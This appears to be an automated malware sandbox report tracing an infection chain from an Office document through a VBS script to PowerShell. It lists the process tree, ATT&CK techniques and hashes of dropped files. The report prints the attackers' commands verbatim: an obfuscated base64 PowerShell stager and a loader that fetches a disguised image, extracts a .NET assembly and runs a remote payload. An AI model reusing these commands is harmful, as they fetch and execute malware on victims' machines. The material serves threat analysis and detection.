⡭ ⛗QwBv⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗D0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗ZQBU⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗B0⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗UwB1⊔ ➙ ꜌ ⡭ ⛗GI⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗aQBu⊔ ➙ ꜌ ⡭ ⛗Gc⊔ ➙ ꜌ ⡭ ⛗K⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bh⊔ ➙ ꜌ ⡭ ⛗HI⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BJ⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗Hg⊔ ➙ ꜌ ⡭ ⛗L⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗YgBh⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗ZQ⊔ ➙ ꜌ ⡭ ⛗2⊔ ➙ ꜌ ⡭ ⛗DQ⊔ ➙ ꜌ ⡭ ⛗T⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗ZwB0⊔ ➙ ꜌ ⡭ ⛗Gg⊔ ➙ ꜌ ⡭ ⛗KQ⊔ ➙ ꜌ ⡭ ⛗7⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗YwBv⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗BC⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗WwBT⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗EM⊔ ➙ ꜌ ⡭ ⛗bwBu⊔ ➙ ꜌ ⡭ ⛗HY⊔ ➙ ꜌ ⡭ ⛗ZQBy⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗XQ⊔ ➙ ꜌ ⡭ ⛗6⊔ ➙ ꜌ ⡭ ⛗Do⊔ ➙ ꜌ ⡭ ⛗RgBy⊔ ➙ ꜌ ⡭ ⛗G8⊔ ➙ ꜌ ⡭ ⛗bQBC⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗cwBl⊔ ➙ ꜌ ⡭ ⛗DY⊔ ➙ ꜌ ⡭ ⛗N⊔ ➙ ꜌ ⡭ ⛗BT⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗cgBp⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Zw⊔ ➙ ꜌ ⡭ ⛗o⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗YgBh⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗ZQ⊔ ➙ ꜌ ⡭ ⛗2⊔ ➙ ꜌ ⡭ ⛗DQ⊔ ➙ ꜌ ⡭ ⛗QwBv⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗p⊔ ➙ ꜌ ⡭ ⛗Ds⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bs⊔ ➙ ꜌ ⡭ ⛗G8⊔ ➙ ꜌ ⡭ ⛗YQBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗BB⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗cwBl⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YgBs⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗9⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗WwBT⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗cwB0⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗FI⊔ ➙ ꜌ ⡭ ⛗ZQBm⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗ZQBj⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗aQBv⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗LgBB⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗cwBl⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗YgBs⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗XQ⊔ ➙ ꜌ ⡭ ⛗6⊔ ➙ ꜌ ⡭ ⛗Do⊔ ➙ ꜌ ⡭ ⛗T⊔ ➙ ꜌ ⡭ ⛗Bv⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗o⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗YwBv⊔ ➙ ꜌ ⡭ ⛗G0⊔ ➙ ꜌ ⡭ ⛗bQBh⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗BC⊔ ➙ ꜌ ⡭ ⛗Hk⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bl⊔ ➙ ꜌ ⡭ ⛗HM⊔ ➙ ꜌ ⡭ ⛗KQ⊔ ➙ ꜌ ⡭ ⛗7⊔ ➙ ꜌ ⡭ ⛗CQ⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗B5⊔ ➙ ꜌ ⡭ ⛗H⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗ZQ⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗D0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗bwBh⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗ZQBk⊔ ➙ ꜌ ⡭ ⛗EE⊔ ➙ ꜌ ⡭ ⛗cwBz⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗bQBi⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗eQ⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Ec⊔ ➙ ꜌ ⡭ ⛗ZQB0⊔ ➙ ꜌ ⡭ ⛗FQ⊔ ➙ ꜌ ⡭ ⛗eQBw⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗K⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗n⊔ ➙ ꜌ ⡭ ⛗GQ⊔ ➙ ꜌ ⡭ ⛗bgBs⊔ ➙ ꜌ ⡭ ⛗Gk⊔ ➙ ꜌ ⡭ ⛗Yg⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Ek⊔ ➙ ꜌ ⡭ ⛗Tw⊔ ➙ ꜌ ⡭ ⛗u⊔ ➙ ꜌ ⡭ ⛗Eg⊔ ➙ ꜌ ⡭ ⛗bwBt⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗Jw⊔ ➙ ꜌ ⡭ ⛗p⊔ ➙ ꜌ ⡭ ⛗Ds⊔ ➙ ꜌ ⡭ ⛗J⊔ ➙ ꜌ ⡭ ⛗Bt⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bo⊔ ➙ ꜌ ⡭ ⛗G8⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗D0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗eQBw⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗LgBH⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗BN⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bo⊔ ➙ ꜌ ⡭ ⛗G8⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗o⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗VgBB⊔ ➙ ꜌ ⡭ ⛗Ek⊔ ➙ ꜌ ⡭ ⛗Jw⊔ ➙ ꜌ ⡭ ⛗p⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗SQBu⊔ ➙ ꜌ ⡭ ⛗HY⊔ ➙ ꜌ ⡭ ⛗bwBr⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗K⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗k⊔ ➙ ꜌ ⡭ ⛗G4⊔ ➙ ꜌ ⡭ ⛗dQBs⊔ ➙ ꜌ ⡭ ⛗Gw⊔ ➙ ꜌ ⡭ ⛗L⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗g⊔ ➙ ꜌ ⡭ ⛗Fs⊔ ➙ ꜌ ⡭ ⛗bwBi⊔ ➙ ꜌ ⡭ ⛗Go⊔ ➙ ꜌ ⡭ ⛗ZQBj⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗WwBd⊔ ➙ ꜌ ⡭ ⛗F0⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗o⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗B4⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗LgBT⊔ ➙ ꜌ ⡭ ⛗E0⊔ ➙ ꜌ ⡭ ⛗VQBE⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗cwBt⊔ ➙ ꜌ ⡭ ⛗HU⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗v⊔ ➙ ꜌ ⡭ ⛗H⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗c⊔ ➙ ꜌ ⡭ ⛗Bt⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗e⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗v⊔ ➙ ꜌ ⡭ ⛗Dg⊔ ➙ ꜌ ⡭ ⛗NQ⊔ ➙ ꜌ ⡭ ⛗x⊔ ➙ ꜌ ⡭ ⛗C4⊔ ➙ ꜌ ⡭ ⛗N⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗3⊔ ➙ ꜌ ⡭ ⛗DE⊔ ➙ ꜌ ⡭ ⛗Lg⊔ ➙ ꜌ ⡭ ⛗2⊔ ➙ ꜌ ⡭ ⛗DQ⊔ ➙ ꜌ ⡭ ⛗Lg⊔ ➙ ꜌ ⡭ ⛗4⊔ ➙ ꜌ ⡭ ⛗Dk⊔ ➙ ꜌ ⡭ ⛗MQ⊔ ➙ ꜌ ⡭ ⛗v⊔ ➙ ꜌ ⡭ ⛗C8⊔ ➙ ꜌ ⡭ ⛗OgBw⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗d⊔ ➙ ꜌ ⡭ ⛗Bo⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗s⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗JwBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗cwBh⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗aQB2⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bv⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗s⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗JwBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗cwBh⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗aQB2⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bv⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗I⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗s⊔ ➙ ꜌ ⡭ ⛗C⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗JwBk⊔ ➙ ꜌ ⡭ ⛗GU⊔ ➙ ꜌ ⡭ ⛗cwBh⊔ ➙ ꜌ ⡭ ⛗HQ⊔ ➙ ꜌ ⡭ ⛗aQB2⊔ ➙ ꜌ ⡭ ⛗GE⊔ ➙ ꜌ ⡭ ⛗Z⊔ ➙ ꜌ ⡭ ⛗Bv⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗L⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗n⊔ ➙ ꜌ ⡭ ⛗FI⊔ ➙ ꜌ ⡭ ⛗ZQBn⊔ ➙ ꜌ ⡭ ⛗EE⊔ ➙ ꜌ ⡭ ⛗cwBt⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗L⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗n⊔ ➙ ꜌ ⡭ ⛗Cc⊔ ➙ ꜌ ⡭ ⛗KQ⊔ ➙ ꜌ ⡭ ⛗p⊔ ➙ ꜌ ⡭ ⛗⊔ ➙ ꜌ ⡭ ⛗==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⊔ ➙ ꜌ ⡭ ⛗','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SMUD/smud/ppmax/851.471.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B7A69FF474CB55CBBEC817CB4508128

Filesize
344B

MD5
c3d72a98a264b0b2e2afe50c30cf82ef

SHA1
b135a8f621de4290a96130a71848b4eef3788885

SHA256
808591a1ec4060c2b44bc443ca511a42d84d8b7abbae617827e192b651588a49

SHA512
5b9e15c354645f3f13b8e30b46f46e8b2c3f77185c4af04bf68965e494415887188befcea0549f86b611721302e141ae61a6f65c7db7fb7be5545b0e89465703

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
4d45f1641813a7ad57691759382671d1

SHA1
c7126c0e33e38433f771969b37f5b35f8163a1c4

SHA256
f32514e81442ca486056bc347843095e83b0198ff58f887ce186503e59165128

SHA512
21558155fe07cab313f9c7ddd6137f416eff4f0f8f79bce477fd1335ad4dcaee05c176bb278a97310bf069410ae2f6172d727479fcdbab74475ce1b6aad6daa2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B7A69FF474CB55CBBEC817CB4508128

Filesize
540B

MD5
ec7c1067b0f6c3fe2671fd6f5613be08

SHA1
20f1c4bd68af1838df660af9df46dd644806c949

SHA256
255b67d0418325a29c83aad41c952a727b46fc568a088943976fd9d8a1c91532

SHA512
d087103193dbfc68e9b778c9a07b745ba6dfb495b274f7dfaec7b763efd07f76abadc53a866e760e9d71a4f17298f6b6e58a9fcd46eded2abb30751e8a4af415

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
ba1231c887444446b4309a9ccad7c267

SHA1
8f6c506a6dd21744b34859f134932c68f13edca4

SHA256
e06cc1dc6fb9378d4329faa1e1e79bba8cc143881df2d37de31d8e3a4db7fd6d

SHA512
166c3cd633661a6c40234c486abbe8d4ffba93b80318098d4541950b49ee24515bafaddf07e018bd3c1d72122f561b0130c87b8eb20e9d2adbecbd6dfbdb6245

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{42162677-36B4-449F-955B-F3A54D055DC1}.FSD

Filesize
128KB

MD5
98f6c1c87b8d2d63478cd56e6a9dd171

SHA1
f724b937f73c1348c3b8c470a0d0da6a2d695cd1

SHA256
b25d15a0b4d78355965ad87f357d52850873e3e8bd71af6fe59f484eaa41a970

SHA512
cd50abf66c3745fbff3869d1e2c6afd6984f6c821f907c49f4b2b0abe281355456c9e7fbe3bd216eee00d2993f7531c82ff7ab33ecb4401d9782c07061913b15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
5b8982775fbf44297ffca0f91990e9d8

SHA1
fccbaafd69cf1180ea817bda19dd8975a67dc615

SHA256
c32319b65179fc2c41d210846882bd2fde11441caf933cdc677e000fd0e96825

SHA512
3bc4840c48575c69ee76667f147f4e67ed5a27f7fb093f1b8a7ca03442df95c144502d5cbbbf89d93c0718cd1d0bf417cd923a7bf5985fe9b45f66e4367b47fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FD6D7536-280E-4B3E-B8D3-619C7C4E6B8F}.FSD

Filesize
128KB

MD5
f9733eca3c76544625b4d1e2b554449d

SHA1
9c0efdad1c2bbc8574f7d399ded9f23ef7b5b70b

SHA256
33431665242800dab3894c73857c4022f7fa663ee772316353b4ce871fb8ec3b

SHA512
f2a43c3d6b89dd1257362616d652190fad7c0bde28004f4663129d3affafb1b7011bf868c24ee3679cc405ade09db9ff3f513074e821a83095739f268dd227c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\sheisworthforbuttermilkwhichgivengreatideastomanagenewthinsgtounderstandhowmuchgreatchocolatewithamaxingfeelings____chocolatecoffeepoweder[1].doc

Filesize
102KB

MD5
3d88ae1173dd6f3122d6936d7078982a

SHA1
93fcf8892973b83230c4cd4a93afd7488a19b4c1

SHA256
0e1e735a713ec9fe401b65753fec786b84496d46e01c05a0193e70f6284a46a8

SHA512
4165874f6bafc41fcdcc1773c374df7e80615d451b6baaf69f0661b36756a4c04406173563963d9df91ff5b5e102bcead9ef1fa4fd4f3c94009c1d5759963dbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab6894.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{142A2AAE-687E-4BEF-893A-3734970E5D2F}

Filesize
128KB

MD5
0e265eb9245405c6946fa30b5f5a2111

SHA1
9b8fdc281ca43cf2e618a1623843c2ef35e4b89e

SHA256
c7cc686e251297ab78a6691ea5426c1fb0384dc948bb2839769f94d0a50519a7

SHA512
2e710a2f236b6029ef22f1c9e29605620bd8c3d6bb7a5a60ee1ecf4d9aa08c7af8580e277414ddff13e7fe5e676410cbe5a2b5bd627ae20545eee470705af3b6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
0591b43514c69bc08b1d57dbc7c3d8c5

SHA1
b1a09a4013a3b3e98e8644c2bc646fbf12ac56b3

SHA256
b9d8568da7f6fe22c622a331c1b330414c592891e7f719ced8c948a8dedfa25d

SHA512
8a1496b0d25c61d88db9cc142433455193bbf0293cf7594c524628f247321005eae803d4eec57ff79d1da8bbacce3c1e93efe2bc1a222d46c68c6ada9011e1d1

Download Submit
C:\Users\Admin\AppData\Roaming\veryniceprocessforbutterchoco.vBS

Filesize
178KB

MD5
b8d0795f46e9790df28051869706d79f

SHA1
aa8890f398693216f16e18287f2d4e227f1df752

SHA256
da99d2f7446cb89a8d83f4da24eeb6f81c20bdab86edfe8b074cd638529d2fa8

SHA512
59c1fa157ac980e352178586804c62fe74002026a490064fe2f876b0bb3d87cd9f66953ce4fbe597ef2a524437b634fe38ef45af0905328d23e69d56604df3bf

Download Submit
memory/2676-95-0x000000007292D000-0x0000000072938000-memory.dmp

Filesize
44KB

Download
memory/2676-18-0x000000002F051000-0x000000002F052000-memory.dmp

Filesize
4KB

Download
memory/2676-20-0x000000007292D000-0x0000000072938000-memory.dmp

Filesize
44KB

Download
memory/2676-22-0x0000000003820000-0x0000000003822000-memory.dmp

Filesize
8KB

Download
memory/2848-1-0x000000007292D000-0x0000000072938000-memory.dmp

Filesize
44KB

Download
memory/2848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2848-94-0x000000007292D000-0x0000000072938000-memory.dmp

Filesize
44KB

Download
memory/2848-23-0x0000000002F10000-0x0000000002F12000-memory.dmp

Filesize
8KB

Download